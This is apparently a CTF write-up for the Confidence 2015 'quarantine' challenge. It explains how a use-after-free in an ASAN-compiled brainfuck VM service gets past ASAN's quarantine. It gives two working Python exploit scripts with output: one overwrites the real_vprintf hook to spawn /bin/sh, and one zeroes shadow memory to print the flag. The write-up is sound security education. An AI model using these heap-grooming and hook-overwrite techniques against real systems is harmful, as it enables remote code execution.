In this post we are going to describe two alternative solutions to the quarantine challenge from the Confidence 2015 Teaser organized by DragonSector. This was a very interesting challenge, and even though it took dreyer and me a looong time to solve it I really enjoyed working on it.
Let's start with the challenge description:
A quick check with checksec reveals the following:
So we not only have to deal with ASAN, but we have a binary with full ASLR, NX and RELRO. This is gonna be fun :)
Let's move on with the analysis. The main binary listens on a given port (passed as a parameter on the command line) and forks for each client. This means that ASLR is not such a big deal, since the addresses will remain constant for each client and we can reuse leaks from ASAN's error reporting for our exploit.
When we connect to the service, it provides the following options:
Additionally, if we look at the main command handler in the binary we find a hidden give_me_the_flag command. The function handling this command opens the flag.txt file, reads it into a global buffer and outputs it using printf.
Let's start with the challenge description:
The developers of this service think they have found a way to automatically thwart all memory corruption attacks. Can you prove them wrong?
The service is running at 134.213.135.43:10000.
Files: vm.so quarantine
Disclaimer: the exploit code below is far from elegant and can probably be greatly improved, but hey it's for a CTF and in those conditions whatever works is good enough ;-p
Preliminary analysis
The quarantine file is the main binary, which uses the vm.so file to interpret brainfuck programs. When we load the binary into IDA, we see that it has been compiled with AddressSanitizer (or ASAN), which is what the challenge description refers to when it says "a way to automatically thwart all memory corruption attacks."A quick check with checksec reveals the following:
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : FULL gdb-peda$
So we not only have to deal with ASAN, but we have a binary with full ASLR, NX and RELRO. This is gonna be fun :)
Let's move on with the analysis. The main binary listens on a given port (passed as a parameter on the command line) and forks for each client. This means that ASLR is not such a big deal, since the addresses will remain constant for each client and we can reuse leaks from ASAN's error reporting for our exploit.
When we connect to the service, it provides the following options:
__________ .__ _____ __ \______ \____________ |__| _____/ ____\_ __ ____ | | __ | | _/\_ __ \__ \ | |/ \ __\ | \_/ ___\| |/ / | | \ | | \// __ \| | | \ | | | /\ \___| < |______ / |__| (____ /__|___| /__| |____/ \___ >__|_ \ \/ \/ \/ \/ \/ _____ .__ .__ / \ _____ ____ | |__ |__| ____ ____ / \ / \\__ \ _/ ___\| | \| |/ \_/ __ \ / Y \/ __ \\ \___| Y \ | | \ ___/ \____|__ (____ /\___ >___| /__|___| /\___ > \/ \/ \/ \/ \/ \/ Choose your option: add: Adds a new virtual machine. remove: Removes a virtual machine. change: Changes the virtual machine program. select: Selects a virtual machine to use. run: Starts the execution of a virtual machine. exit: Terminates the connection. Option:
Since the developers of this system think they do not need to care about memory corruption due to the use of ASAN, the code is full of bugs.
Unfortunately, when entering this command we overflow a stack buffer and get detected by ASAN. So it seems we'll need to do some more work than this ;)
Reverse engineering the main binary
When analyzing the code in the main binary, we find that the program keeps a linked list of VMs. The linked list starts at the first_vm global symbol, and VMs are always added at the front of the list.
When a vm is selected, the current_vm symbol is set to point to it. When run is executed, the selected VM is executed as you can see in this code:
When a vm is selected, the current_vm symbol is set to point to it. When run is executed, the selected VM is executed as you can see in this code:
__int64 __cdecl run() { __int64 v0; // rdx@0 __int64 v1; // rcx@0 const char *v2; // rsi@0 __int64 v3; // r8@0 unsigned __int64 v4; // r9@0 __int64 result; // rax@2 char v6; // [sp+0h] [bp-10h]@0 if ( globals::current_vm[0] ) LODWORD(result) = vm::run(globals::current_vm[0]); else LODWORD(result) = printf( "No machine selected for execution. Please use the \"select\" command first.\n"); return result; }
When a VM is removed, the code goes through the list of VMs until it finds the right VM and frees it. However, if the VM is not the first_vm the code forgets to check whether current_vm points to it or not.
Therefore, if we select a VM (other than first_vm, i.e. the last added VM) and then remove it, we get a dangling pointer as the current_vm. If we manage to reallocate this memory, we would have a VM structure totally under control.
Reverse engineering the VM structure
Before we move on, we also need to understand the data structure used to keep track of the VMs and how they are used. We can do that by looking at the code initializing VMs in the main binary or by looking at the vm.so code. I found it easier to look at the vm.so code since it is not so cluttered with ASAN's stuff.
The data structure used to represent a VM looks like this (as defined in my IDA database):
00000000 bfvm struc ; (sizeof=0x38) 00000000 array dq ? ; XREF: vm::run(vm::VMState *)+1D0 r 00000000 ; vm::run(vm::VMState *)+1FD r ... 00000008 arraysz dd ? 0000000C field_C dd ? 00000010 program dq ? 00000018 progamsz dd ? 0000001C idx dd ? ; XREF: vm::run(vm::VMState *)+1C7 r 0000001C ; vm::run(vm::VMState *)+1F4 r ... 00000020 field_20 dd ? 00000024 field_24 dd ? 00000028 name db 16 dup(?) 00000038 bfvm ends
When the vm::run method is called, first vm::reset_state is called on the VM. This is what this method does:
__int64 __fastcall vm::reset_state(struct bfvm *a1) { __int64 result; // rax@2 unsigned int i; // [sp+0h] [bp-Ch]@1 a1->idx = 0; for ( i = 0; ; ++i ) { result = i; if ( i >= a1->arraysz ) break; *(_BYTE *)(a1->array + i) = 0; } return result; }
Thus, it takes the array pointer and zeroes it out. Next, it enters a loop of processing instructions. A bounds check of the array pointer is performed, and if it fails an error is printed, the VM is reset and the program exits. If the array pointer is within bounds, the code parses the command at the current program counter and executes it.
Note that if a loop is found ([ or ]), the code also performs a search for the matching bracket and prints an error if it cannot find it. These error prints are performed using printf, which will become important in our solution later on ;-).
ASAN and Use-After-Free conditions
So now we have an idea of what our dangling pointer will be used for: to zero out a piece of data, run a brainfuck program using this data as the brainfuck VM memory, and finally zero it out again before returning.
Now we need to figure out how to exploit a Use-After-Free in presence of ASAN. During the CTF, we had no idea on how ASAN worked internally, so we started looking around in Google. One of the key resources was this post from Scarybeast.
In this post, a C program is provided that will trigger a use-after-free without ASAN noticing it. The code is based on allocating and freeing a lot of memory in order to achieve a reallocation of the freed chunk.
We used this code as a basis, and made some experiments on our test machine. Here is the relevant code fragment:
for i in xrange(40):
add("vm%d" % i, 56, "A"*50, 56)
select(20)
remove(20)
for i in xrange(i+1, i+loop):
print i
add("vm%d" % i, 128, "A"*100, 0x400000)
remove(40)
for i in xrange(i+1, i+loop):
print i
add("vm%d" % i, 56, "A"*56, 0x400000)
After some experiments, we figured that our local machine with the default configuration required a value of 300 for the loop variable in order to trigger the re-allocation of the removed VM. For the remote machine a value of 60 worked well during the CTF. When run with ASAN_OPTIONS=quarantine_size=16777216 on my local machine, the binary behaves similarly to the remote server. So if you want to test the exploits below, you can use these settings.The way the ASAN UaF detection system works is based on introducing a quarantine zone where freed chunks are kept for a while. The quarantine zone is only freed after a certain amount of memory has been placed into it (similar to Microsoft's delayed free in Internet Explorer). The hope is that with this approach, use-after-free conditions will be easily caught during fuzzing/testing since it is unlikely that so much memory is freed and reallocated before the reuse of the dangling pointer.
Anyway, with the above code (in particular with the freeing of big amounts of data) we managed to evict the target chunk from the quarantine and get it allocated again. So now it's time to move on and exploit this bug!
Solution 1: getting a shell
So let's first discuss our own solution, and then discuss the intended challenge solution. Our own solution was to use the UaF to get overwrite some arbitrary memory and get a shell.
The binary uses RELRO, so we cannot target the GOT. However, ASAN places some hooks in functions such as printf, scanf, etc. as you can see here:
int __fastcall printf(__sanitizer::StackTrace *this, const char *a2, __int64 a3, __int64 a4, __int64 a5, unsigned __int64 a6, char a7)
{
int (__fastcall *v7)(_QWORD, _QWORD); // rcx@6
int (__fastcall *v8)(_QWORD, _QWORD); // rax@7
char v10; // [sp+0h] [bp-108h]@1
const char *v11; // [sp+8h] [bp-100h]@1
__int64 v12; // [sp+10h] [bp-F8h]@1
__int64 v13; // [sp+18h] [bp-F0h]@1
__int64 v14; // [sp+20h] [bp-E8h]@1
unsigned __int64 v15; // [sp+28h] [bp-E0h]@1
__int128 v16; // [sp+B0h] [bp-58h]@1
char *v17; // [sp+C0h] [bp-48h]@1
__int128 v18; // [sp+D0h] [bp-38h]@4
char *v19; // [sp+E0h] [bp-28h]@4
v15 = a6;
v14 = a5;
v13 = a4;
v12 = a3;
v11 = a2;
v17 = &v10;
*((_QWORD *)&v16 + 1) = &a7;
*(_QWORD *)&v16 = 206158430216LL;
if ( !__asan::asan_init_is_running )
{
if ( __asan::asan_inited
|| (__asan::AsanInitFromRtl(this, (signed __int64)&__asan::asan_init_is_running, a2, a6),
!__asan::asan_init_is_running) )
{
if ( !__asan::asan_inited )
__asan::AsanInitFromRtl(this, (signed __int64)&v18, a2, a6);
v19 = v17;
v18 = v16;
if ( __sanitizer::common_flags_dont_use[56] )
{
a2 = (const char *)&v18;
sub_46F70(this, (unsigned __int64)&v18, (const char *)&v18);
}
}
}
v7 = *(int (__fastcall **)(_QWORD, _QWORD))__interception::real_vprintf;
if ( __sanitizer::indirect_call_wrapper )
{
LODWORD(v8) = __sanitizer::indirect_call_wrapper(*(_QWORD *)__interception::real_vprintf, a2);
v7 = v8;
}
return v7(this, &v16);
}
So we targeted this call. Our strategy is create a fake VM structure that contains the following data:- Array pointer: quarantine+0x4FE328, which is the address of the real_vprintf symbol above.
- Array size: 8 bytes (the size of a pointer in x64)
- Program: pointer to the heap, where we'll have prepared a brainfuck program
Then, the brainfuck program will perform a series of ", >" commands. This will read from standard input using getchar, write it over the target symbol and increment the data pointer. With this we can control the value of the real_vprintf hook.
The next step is actually triggering the call without exiting the VM. If we exit the VM, the data will be zeroed so we'll crash with a null pointer exception.
But since our VM interpreter calls printf on error conditions, we just need to trigger one! What we did was adding a bunch of [ at the end of the VM program, such that the loops were out of balance and printf would be called.
The final question is what to overwrite real_vprintf with. Our first attempt was to use the give_flag() address, since the code already reads the flag and prints it out. Unfortunately, it does so via printf and this results in an infinite recursion... so we turned into executing a shell.
For this, we use the following gadget:
.text:000000000004652C mov rax, cs:environ_ptr_0 .text:0000000000046533 lea rdi, aBinSh ; "/bin/sh" .text:000000000004653A lea rsi, [rsp+180h+var_150] .text:000000000004653F mov cs:dword_3C06C0, 0 .text:0000000000046549 mov cs:dword_3C06D0, 0 .text:0000000000046553 mov rdx, [rax] .text:0000000000046556 call execve
print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
add("vm%d" % i, 56, "A", 56)
# Select and free one of them
print "[*] Creating UAF condition"
select(20)
remove(20)
# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
add("vm%d" % i, 128, "A"*100, 0x400000)
remove(40)
print "[*] Reallocating memory"
for i in xrange(i+1, i+loop):
add("vm%d" % i, 56, p64(printf)+p32(8)+"XXXX" + p64(heap)+ p32(30) +",,,,,,,>,>,>,>,>,>,>,>,>,[[[[[", 0x400000)
print "[*] Triggering shell! "
# # Exit for my own libc
runsend("A"+p64(target)+"A"*20)
x.send("echo w00t;\n")
x.readuntil("w00t\n")
print "[*] Everything ok! Dropping into shell."
x.send("id\n")
x.interactive()
Which gives the following output when we run it on my test machine:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python client.py [+] Opening connection to localhost on port 1234: Done [*] Performing initial allocations [*] Creating UAF condition [*] Freeing enough memory... [*] Reallocating memory [*] Triggering shell! [*] Everything ok! Dropping into shell. [*] Switching to interactive mode uid=1000(sfx) gid=1000(sfx) groups=1000(sfx),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),124(sambashare) $ uname -a Linux ubuntu 3.16.0-31-generic #43-Ubuntu SMP Tue Mar 10 17:37:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux $ cat flag.txt THISISTHEFLAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $
Which during the CTF resulted in the following flag:
[*] Switching to interactive mode $ cat flag.txt DrgnS{5h0uldve_us3d_Sophos_Qu4rantine!} $
Solution 2: zero-out shadow memory
It turns out the intended solution was actually slightly easier than our solution. ASAN works by keeping a shadow memory region in which it keeps track of the state of different memory areas. When it finds a problem, it reports where the fault originated and what the associated shadow region is.
For example, if we try to run the give_me_the_flag command we get this:
Option: give_me_the_flag ================================================================= ==115178==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffcb44e248 at pc 0x7f2cc53068f6 bp 0x7fffcb44e0c0 sp 0x7fffcb44d858 WRITE of size 17 at 0x7fffcb44e248 thread T0 #0 0x7f2cc53068f5 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x458f5) #1 0x7f2cc53076b0 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x466b0) #2 0x7f2cc5380493 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf493) #3 0x7f2cc537dd34 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbcd34) #4 0x7f2cc3ca0ec4 (libc.so.6+0x21ec4) #5 0x7f2cc537c0bc (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbb0bc) Address 0x7fffcb44e248 is located in stack of thread T0 at offset 40 in frame #0 0x7f2cc53803bf (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf3bf) This frame has 1 object(s): [32, 40) 'op' <== Memory access at offset 40 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x100079681bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100079681c40: 00 00 00 00 f1 f1 f1 f1 00[f3]f3 f3 00 00 00 00 0x100079681c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100079681c70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 04 f2 0x100079681c80: 00 f2 f2 f2 04 f2 00 00 f2 f2 04 f2 04 f2 04 f3 0x100079681c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc ASan internal: fe
This tells us that if we zero out the bytes starting at 0x100079681c49 (shadow1 in my exploit) we should not trigger this detection and we should be able to call this command. As we know, we can do that by pointing the array space of the fake VM structure to this address and then running the VM.
However, if we do this we get another error:
However, if we do this we get another error:
0x7f2cc61dcff0 is located 0 bytes to the right of global variable 'globals::flag_buffer' defined in 'challenge.cc:27:6' (0x7f2cc61dcfe0) of size 16 SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0fe618c339a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c339b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c339c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c339d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c339e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 =>0x0fe618c339f0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00[f9]f9 0x0fe618c33a00: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c33a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c33a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c33a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe618c33a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Which means we actually need to trigger a zero-out again on a second shadow memory region (shadow2), because the flag was too large to fit in the global buffer that was used to read it! Fortunately we can change our VM program by using the change command. We can change the most recent N VMs that we added and then try to run again. After this, we are able to issue the give_me_the_flag command and get the flag :)
print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
add("vm%d" % i, 56, "A", 56)
# Select and free one of them
print "[*] Creating UAF condition"
select(20)
remove(20)
# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
add("vm%d" % i, 128, "A"*100, 0x400000)
remove(40)
print "[*] Reallocating memory"
# And reallocate it
for i in xrange(i+1, i+loop2):
add("vm%d" % i, 56, p64(shadow1)+p32(16)+("%.4x" % i) + p64(heap)+ p32(30) +"+", 0x400000)
print "[*] Zeroing shadow memory for stack buffer"
# Zero out shadow1
run()
print "[*] Replacing program "
# Now replace the fake VM struct to zero out shadow2
for i in xrange(20):
change(i, p64(shadow2)+p32(20)+"XXXX" + p64(heap)+ p32(1) +"+")
print "[*] Zeroing shadow memory for global buffer"
# And actually do it
run()
# And now just send give_me_the_flag
x.write("\n")
x.write("give_me_the_flag\n")
x.readuntil("Your flag is:")
print "[*] YOUR FLAG: " , x.readuntil("\n")
And when we run it:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python exp2.py [+] Opening connection to localhost on port 1234: Done [*] Performing initial allocations [*] Creating UAF condition [*] Freeing enough memory... [*] Reallocating memory [*] Zeroing shadow memory for stack buffer [*] Replacing program [*] Zeroing shadow memory for global buffer [*] YOUR FLAG: THISISTHEFLAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [*] Closed connection to localhost port 1234
Great, Thanks !
ReplyDeleteAwesome explanation
ReplyDelete